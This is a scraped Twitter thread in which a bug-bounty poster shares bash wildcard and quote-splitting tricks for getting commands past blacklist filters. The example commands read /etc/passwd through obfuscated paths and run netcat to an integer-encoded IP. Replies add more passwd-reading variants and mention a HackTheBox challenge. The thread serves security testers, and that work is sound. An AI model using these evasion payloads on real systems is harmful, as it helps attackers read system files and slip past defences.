![](data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" width="73" height="73"><rect fill-opacity="0"/></svg>)
#Protip can somebody read your passwd file with: "/???/?at /???/????w?" ? yes.
bypass blacklisted words filter (or firewalls) via bash wildcards.
/b'i'n/c'a't /e't'c/p'a's's'w'd'
/???/?at /???/????w?
/usr/b'i'n/'n'c 2130706433 80
/???/???/n? 2130706433 80
#BugBounty #infosecpic.twitter.com/M35RHcBuAN
![](data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" width="1172" height="612"><rect fill-opacity="0"/></svg>)
-
-
-
wow, thanks for sharing.
End of conversation
New conversation -
-
-
Thanks for reminding the community and showing in Windows. Here's a blog I wrote in 2016 after seeing the technique used by nation state actors, good stuff -- https://www.ixiacom.com/company/blog/equation-group-musings-sfg-command …
-
neat, this is a pretty cool reading, also I shared some time ago pretty similar techniques for unix / linux, thanks for sharinghttps://twitter.com/omespino/status/999229294286077954…
End of conversation
New conversation -
-
-
Yea .. this bypasses are good for flux capacitor.htb
![😂](data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" width="72" height="72"><rect fill-opacity="0"/></svg> "Face with tears of joy")
-
I seems that this techniques work for that too, some people ask me how to solve that via inbox but I even didn't know that this challenge existed looool
End of conversation
New conversation -
-
-
/bin/cat `echo /*/p*ssw*`
-
also /???/?at $(echo /*/p***w*)
End of conversation
New conversation -
-
-
@hackthebox_eu Flux Capacitor work in progress? :D -
not really, loool
End of conversation
New conversation -
